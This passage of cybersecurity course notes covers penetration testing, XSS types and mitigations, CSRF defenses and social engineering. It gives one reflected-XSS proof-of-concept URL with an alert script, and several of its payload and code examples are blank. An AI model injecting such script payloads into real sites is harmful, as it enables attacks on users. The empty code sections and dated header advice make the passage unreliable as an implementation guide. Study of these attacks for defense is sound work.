3. Configuration Review:
- Objective: Identify common configuration errors that could allow
unauthorized access to the wireless network.
- Method: Testers review wireless infrastructure configurations, including
SSIDs, encryption settings, and client profiles, to ensure they are secure.
- Outcome: Recommendations for correcting configuration errors and
improving wireless security.

By conducting wireless penetration testing, organizations can ensure their Wi-Fi


networks are secure and resilient against attacks, protecting sensitive data and
maintaining network integrity.

MOBILE APPLICATION PENETRATION TESTING

Mobile Application Penetration Testing is essential for ensuring the security of


mobile applications, which are increasingly becoming targets for cyberattacks.
This type of testing helps identify vulnerabilities in mobile apps that could be
exploited to gain unauthorized access, steal sensitive data, or disrupt services.
The main areas of focus in mobile application penetration testing include:

API Security Testing:


- Objective: Evaluate the security of backend APIs that the mobile application
communicates with.
- Method: Testers perform API testing to identify vulnerabilities such as
improper authentication, authorization issues, and insecure data handling. They
also check for potential injection attacks, such as SQL injection and command
injection.
- Outcome: Detailed findings on API security weaknesses and guidance on
securing API endpoints and implementing robust authentication and
authorization mechanisms.

Client-Side Security Testing:


- Objective: Identify vulnerabilities in the client-side logic of the mobile
application.
- Method: Testers analyze the app’s client-side functionality to find issues
such as insecure data storage, weak input validation, and exposure of sensitive
information through logs or error messages.
- Outcome: Recommendations for securing client-side operations, including
proper input validation and secure data storage practices.

Authentication and Authorization Testing:


- Objective: Assess the effectiveness of the mobile application’s
authentication and authorization mechanisms.
- Method: Testers attempt to bypass authentication, exploit weak passwords,
and test for issues such as insecure token handling and improper session
management.
- Outcome: Insights into authentication and authorization vulnerabilities and
suggestions for strengthening user access controls.

Reverse Engineering:
- Objective: Analyze the mobile application’s binary to understand its internal
logic and identify security weaknesses.
- Method: Testers use reverse engineering tools to decompile the app, analyze
the code, and identify potential vulnerabilities such as hardcoded credentials,
insecure cryptographic implementations, and obfuscation weaknesses.
- Outcome: A report on findings from reverse engineering and
recommendations for improving code obfuscation and securing sensitive
information within the app.

Device Security Testing:


- Objective: Evaluate how the mobile application interacts with the device and
ensure it does not compromise device security.
- Method: Testers assess the app’s permissions, use of device resources, and
interaction with other apps to identify issues such as excessive permissions,
insecure inter-app communication, and exploitation of device vulnerabilities.
- Outcome: Recommendations for securing device interactions, including
minimizing permissions and securing inter-app communication channels.

User Interface (UI) Security Testing:


- Objective: Ensure the mobile application’s UI does not introduce security
vulnerabilities.
- Method: Testers analyze the UI components for issues such as insecure input
fields, exposure of sensitive information, and susceptibility to UI manipulation
attacks like clickjacking.
- Outcome: Recommendations for securing the UI, including implementing
secure input handling and protecting sensitive information from being exposed.

By conducting thorough mobile application penetration testing, organizations


can identify and address security vulnerabilities, ensuring their mobile apps are
secure and protecting user data from potential attacks. This proactive approach
helps maintain user trust and safeguards the organization’s reputation.
UNIT 5

CROSS-SITE SCRIPTING (XSS)

Cross-Site Scripting (XSS) vulnerabilities are common in web applications


due to the dynamic nature of web content and the increasing amount of user
interaction. XSS attacks exploit the fact that web applications execute scripts
in users' browsers. If users can alter these scripts, it creates a security risk.
XSS attacks are categorized mainly into three types:

1. Stored XSS: The malicious script is stored on the server (e.g., in a database)
and executed when the data is retrieved and rendered by the browser.
2. Reflected XSS: The script is not stored on the server but is immediately
reflected back to the user as part of a response.
3. DOM-based XSS: The attack occurs entirely on the client side by
manipulating the Document Object Model (DOM).

Let's explore these types with examples and understand how each works and
how they can be mitigated.

Stored XSS

Stored XSS attacks involve injecting malicious scripts into a web application
where the data is stored (e.g., in a database) and later displayed to users
without proper sanitization.

Example:
A customer submits a support request on `support.mega-bank.com` including
HTML tags to emphasize text. If the application does not sanitize this input, it
stores the raw HTML. Later, when this comment is viewed by a customer
support representative, the HTML is rendered, potentially executing malicious
scripts.

Malicious Payload Example:

Mitigation:
- Sanitize Inputs: Ensure any user input is sanitized before storing it.
- Use Output Encoding: Encode output data so that any HTML or scripts are
treated as plain text.
- Content Security Policy (CSP): Implement CSP to restrict the sources from
which scripts can be executed.

Reflected XSS

Reflected XSS occurs when user input is immediately included in the output
without being stored. This often happens in URL parameters, form
submissions, or HTTP headers.

Example:
A support portal search page (`support.mega-
bank.com/search?query=<script>alert('XSS')</script>`) includes the search
term in the page output. If the input is not sanitized, the script executes when
the search results page is rendered.

Malicious Payload Example:

Mitigation:
- Sanitize and Validate Inputs: Ensure all inputs are properly sanitized and
validated.
- Use Safe Methods to Display Data: Avoid using methods like `innerHTML`
that interpret and execute HTML and scripts.
- HTTP Headers: Use HTTP headers such as `X-XSS-Protection` to prevent
some types of XSS attacks.

DOM-based XSS

DOM-based XSS occurs when the client-side script manipulates the DOM and
insecurely handles data from user inputs.

Example:
A web application dynamically updates the content of a page using data from
the URL hash or query parameters. If these inputs are not properly sanitized,
an attacker can inject a script.

Malicious Payload Example:


Mitigation:
- Secure JavaScript Code: Avoid using `document.write()` or `innerHTML`
with user inputs.
- Use Safe DOM Methods: Prefer methods that handle text content securely,
such as `textContent` or `createTextNode()`.
- Sanitize Data Before Use: Always sanitize and validate data from URL
parameters, hash values, or any other user-controllable sources.

Conclusion

XSS attacks pose significant risks to web applications, potentially leading to


data theft, session hijacking, and other malicious activities. Understanding the
types of XSS and implementing proper sanitization, output encoding, and
security policies are crucial steps in protecting applications from these
vulnerabilities. Regular security audits and staying updated with best practices
are also essential in maintaining a secure web application environment.

DEFENDING AGAINST CSRF ATTACKS


Cross-Site Request Forgery (CSRF) attacks exploit a user's authenticated
session to make unauthorized requests on their behalf. These attacks can be
executed through various means, such as `<a>` links, `<img>` tags, and HTTP
POST requests using web forms. They are particularly dangerous because they
operate with the user's privileges and often go unnoticed by the user. This essay
outlines strategies for defending against CSRF attacks, ensuring user safety and
maintaining the integrity of web applications.

Understanding CSRF Attacks

CSRF attacks manipulate authenticated sessions to perform actions without the


user's consent. For instance, clicking on a malicious link or loading a malicious
image could trigger an unwanted request to the server. These requests appear
legitimate to the server because they come from an authenticated session,
making them hard to detect and prevent.

Header Verification
One of the primary defenses against CSRF attacks is verifying the origin of
requests using HTTP headers. Two headers are particularly useful:

- Origin Header: Sent with HTTP POST requests, it indicates the origin of the
request. An example of an origin header is `Origin: https://www.mega-
bank.com`.

- Referer Header: Sent with all requests, this header shows the URL of the
previous web page from which a link was followed. An example is `Referer:
https://www.mega-bank.com`.

By checking these headers against a list of trusted origins, servers can filter out
potentially malicious requests. For instance, a Node.js implementation might
look like this:

Limitations of Header Verification


While checking headers is a good first line of defense, it is not foolproof. If an
attacker compromises a trusted origin through Cross-Site Scripting (XSS), they
can bypass this check. Therefore, relying solely on header verification is
insufficient.

CSRF Tokens

CSRF tokens offer a robust defense mechanism. These tokens are unique per
session and user, significantly reducing the feasibility of successful CSRF
attacks. The process works as follows:

1. Token Generation: The server generates a unique token using cryptographic


methods and sends it to the client.

2. Token Validation: Each request from the client must include this token. The
server validates the token to ensure it is correct, live, and unaltered.

An example implementation in a stateless API might include encrypting the


token with user-specific information and a nonce, ensuring it remains valid for a
limited time. The server decrypts and verifies the token upon receiving a
request.

Best Practices for CSRF Prevention

Implementing effective CSRF defenses involves adopting best practices at both


the design and coding levels:
1. Stateless GET Requests: GET requests should not alter server-side state.
They are susceptible to simple CSRF attacks via links or images. For example,
instead of using a GET request to update a user, separate retrieval and update
operations into distinct GET and POST requests, respectively.

2. Application-Wide CSRF Mitigation: Apply CSRF defenses uniformly


across the application. This includes using middleware to check CSRF tokens
and headers on all requests. An example middleware implementation might
look like this:

3. Request-Checking Middleware: Implement middleware to validate headers


and CSRF tokens before processing requests. This ensures consistent
application of security measures across all endpoints.

4. Client-Side Automation: Automate the inclusion of CSRF tokens in client


requests. This can be done by overriding the default behavior of
XMLHttpRequest or using a custom library to wrap requests.

Conclusion

Defending against CSRF attacks requires a multi-faceted approach, combining


header verification, CSRF tokens, and best coding practices. By implementing
these strategies, developers can significantly reduce the risk of CSRF attacks
and protect users' authenticated sessions. Ensuring that GET requests do not
alter state, applying application-wide defenses, and automating token inclusion
on the client side are critical steps in maintaining a secure web application.
WHAT IS SOCIAL ENGINEERING

Social engineering is the term used for a broad range of malicious activities
accomplished through human interactions. It uses psychological manipulation to
trick users into making security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first


investigates the intended victim to gather necessary background information,
such as potential points of entry and weak security protocols, needed to proceed
with the attack. Then, the attacker moves to gain the victim’s trust and provide
stimuli for subsequent actions that break security practices, such as
revealing sensitive information or granting access to critical resources.

Social Engineering Attack Lifecycle

What makes social engineering especially dangerous is that it relies on human


error, rather than vulnerabilities in software and operating systems. Mistakes
made by legitimate users are much less predictable, making them harder to
identify and thwart than a malware-based intrusion.

Social engineering attack techniques


Social engineering attacks come in many different forms and can be performed
anywhere where human interaction is involved. The following are the five most
common forms of digital social engineering assaults.

Baiting

As its name implies, baiting attacks use a false promise to pique a victim’s
greed or curiosity. They lure users into a trap that steals their personal
information or inflicts their systems with malware.

The most reviled form of baiting uses physical media to disperse malware. For
example, attackers leave the bait—typically malware-infected flash drives—in
conspicuous areas where potential victims are certain to see them (e.g.,
bathrooms, elevators, the parking lot of a targeted company). The bait has an
authentic look to it, such as a label presenting it as the company’s payroll list.

Victims pick up the bait out of curiosity and insert it into a work or home
computer, resulting in automatic malware installation on the system.

Baiting scams don’t necessarily have to be carried out in the physical world.
Online forms of baiting consist of enticing ads that lead to malicious sites or
that encourage users to download a malware-infected application.

Scareware

Scareware involves victims being bombarded with false alarms and fictitious
threats. Users are deceived to think their system is infected with malware,
prompting them to install software that has no real benefit (other than for the
perpetrator) or is malware itself. Scareware is also referred to as deception
software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners


appearing in your browser while surfing the web, displaying such text such as,
“Your computer may be infected with harmful spyware programs.” It either
offers to install the tool (often malware-infected) for you or will direct you to a
malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings or
makes offers for users to buy worthless/harmful services.
Pretexting

Here an attacker obtains information through a series of cleverly crafted lies.


The scam is often initiated by a perpetrator pretending to need sensitive
information from a victim so as to perform a critical task.

The attacker usually starts by establishing trust with their victim by


impersonating co-workers, police, bank and tax officials, or other persons who
have right-to-know authority. The pretexter asks questions that are ostensibly
required to confirm the victim’s identity, through which they gather important
personal data.

All sorts of pertinent information and records is gathered using this scam, such
as social security numbers, personal addresses and phone numbers, phone
records, staff vacation dates, bank records and even security information related
to a physical plant.

Phishing

As one of the most popular social engineering attack types, phishing scams are
email and text message campaigns aimed at creating a sense of urgency,
curiosity or fear in victims. It then prods them into revealing sensitive
information, clicking on links to malicious websites, or opening attachments
that contain malware.

An example is an email sent to users of an online service that alerts them of a


policy violation requiring immediate action on their part, such as a required
password change. It includes a link to an illegitimate website—nearly identical
in appearance to its legitimate version—prompting the unsuspecting user to
enter their current credentials and new password. Upon form submittal the
information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them are much easier for mail servers
having access to threat sharing platforms.

Spear phishing

This is a more targeted version of the phishing scam whereby an attacker


chooses specific individuals or enterprises. They then tailor their messages
based on characteristics, job positions, and contacts belonging to their victims to
make their attack less conspicuous. Spear phishing requires much more effort
on behalf of the perpetrator and may take weeks and months to pull off. They’re
much harder to detect and have better success rates if done skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an


organization’s IT consultant, sends an email to one or more employees. It’s
worded and signed exactly as the consultant normally does, thereby deceiving
recipients into thinking it’s an authentic message. The message prompts
recipients to change their password and provides them with a link that redirects
them to a malicious page where the attacker now captures their credentials.

Social engineering prevention

Social engineers manipulate human feelings, such as curiosity or fear, to carry


out schemes and draw victims into their traps. Therefore, be wary whenever you
feel alarmed by an email, attracted to an offer displayed on a website, or when
you come across stray digital media lying about. Being alert can help you
protect yourself against most social engineering attacks taking place in the
digital realm.

Moreover, the following tips can help improve your vigilance in relation to
social engineering hacks.

• Don’t open emails and attachments from suspicious sources – If you


don’t know the sender in question, you don’t need to answer an email.
Even if you do know them and are suspicious about their message, cross-
check and confirm the news from other sources, such as via telephone or
directly from a service provider’s site. Remember that email addresses
are spoofed all of the time; even an email purportedly coming from a
trusted source may have actually been initiated by an attacker.
• Use multifactor authentication – One of the most valuable pieces of
information attackers seek are user credentials. Using multifactor
authentication helps ensure your account’s protection in the event of
system compromise. Imperva Login Protect is an easy-to-deploy 2FA
solution that can increase account security for your applications.
• Be wary of tempting offers – If an offer sounds too enticing, think twice
before accepting it as fact. Googling the topic can help you quickly
determine whether you’re dealing with a legitimate offer or a trap.
• Keep your antivirus/antimalware software updated – Make sure
automatic updates are engaged or make it a habit to download the latest
signatures first thing each day. Periodically check to make sure that the
updates have been applied and scan your system for possible infections.

You might also like